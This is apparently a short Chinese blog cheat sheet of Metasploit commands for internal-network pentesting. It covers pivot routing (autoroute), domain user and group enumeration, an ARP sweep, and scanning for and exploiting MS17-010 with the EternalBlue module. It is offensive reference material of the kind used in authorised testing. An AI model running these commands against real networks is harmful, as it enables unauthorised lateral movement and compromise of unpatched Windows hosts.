前言
太菜了,只能边看边渗透这样子勉强维持生活
信息收集
路由
route list //查看内网路由
run get_local_subnets //获取路由信息
run post/multi/manage/autoroute //自动设置路由
/*
或者使用 run autoroute -s 10.0.0.0 -n 255.0.0.0
-s 参数为网关 -n 参数为只掩码
*/
run autoroute -p //查看设置路由
域相关
net group /domain //获得所有域用户组列表
net user /domain //获得所有域用户列表
scan
use auxiliary/scanner/discovery/arp_sweep //arp
攻击
ms17_010
use auxiliary/scanner/smb/smb_ms17_010 //扫描是否存在
use exploit/windows/smb/ms17_010_eternalblue //攻击64位
Comments | NOTHING